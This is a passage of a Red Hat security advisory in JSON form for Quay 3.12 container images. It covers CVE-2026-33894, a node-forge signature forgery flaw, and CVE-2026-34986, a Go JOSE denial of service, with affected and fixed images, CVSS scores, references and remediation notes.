            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452464"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "RHBZ#2452464",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33894",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
        },
        {
          "category": "external",
          "summary": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
          "url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
        },
        {
          "category": "external",
          "summary": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
          "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
        },
        {
          "category": "external",
          "summary": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
          "url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
        },
        {
          "category": "external",
          "summary": "https://www.rfc-editor.org/rfc/rfc8017.html",
          "url": "https://www.rfc-editor.org/rfc/rfc8017.html"
        }
      ],
      "release_date": "2026-03-27T20:45:49.583000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification"
    },
    {
      "cve": "CVE-2026-34986",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-06T17:01:34.639203+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2455470"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
